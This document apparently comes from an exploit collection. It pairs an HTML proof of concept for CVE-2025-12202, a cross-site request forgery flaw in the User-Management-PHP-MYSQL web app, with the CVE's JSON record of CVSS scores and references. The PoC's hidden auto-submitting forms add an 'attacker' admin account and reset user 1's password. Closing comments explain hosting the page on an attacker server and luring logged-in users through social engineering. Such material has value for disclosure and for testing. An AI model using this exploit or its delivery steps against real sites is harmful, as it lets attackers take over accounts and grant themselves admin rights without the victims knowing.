CVE-2025-12202

<!-- CSRF PoC for CVE-2025-12202 --> <!-- Target: ajayrandhawa User-Management-PHP-MYSQL --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - CVE-2025-12202</title> </head> <body> <h1>CSRF PoC for User Management System</h1> <p>If you see this message, the CSRF attack has been executed.</p> <!-- Example: Add new admin user --> <form id="csrfForm" action="http://target.com/add_user.php" method="POST" style="display:none;"> <input type="hidden" name="username" value="attacker"> <input type="hidden" name="email" value="[email protected]"> <input type="hidden" name="password" value="P@ssw0rd123"> <input type="hidden" name="role" value="admin"> <input type="hidden" name="submit" value="Add User"> </form> <!-- Example: Change user password --> <form id="passwordChangeForm" action="http://target.com/change_password.php" method="POST" style="display:none;"> <input type="hidden" name="user_id" value="1"> <input type="hidden" name="new_password" value="Hacked123"> <input type="hidden" name="confirm_password" value="Hacked123"> </form> <script> // Auto-submit forms when page loads window.onload = function() { // Uncomment the desired attack: // document.getElementById('csrfForm').submit(); // document.getElementById('passwordChangeForm').submit(); console.log('CSRF PoC loaded - forms ready for attack'); }; </script> </body> </html> <!-- Attack Delivery Method --> <!-- 1. Host this HTML on attacker-controlled server --> <!-- 2. Use social engineering to trick authenticated user into visiting --> <!-- 3. Forms auto-submit with user's session cookie --> <!-- 4. Action executes without user's knowledge -->

{"cve": {"id": "CVE-2025-12202", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:46.560", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in ajayrandhawa User-Management-PHP-MYSQL web up to fedcf58797bf2791591606f7b61fdad99ad8bff1. This vulnerability affects unknown code. Performing manipulation results in cross-site request forgery. The attack can be initiated remotely. The exploit has been released to the public and may be exploited. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}, {"lang": "en", "value": "CWE-862"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ajayrandhawa:user-management-php-mysql:*:*:*:*:*:*:*:*", "versionEndIncluding": "2023-03-16", "matchCriteriaId": "F376A1FB-C2BA-4381-8E52-E1C6382FBF28"}]}]}], "references": [{"url": "https://github.com/Lianhaorui/Report/blob/main/CSRF-10.11.7z", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://vuldb.com/?ctiid.329872", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.329872", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.673435", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}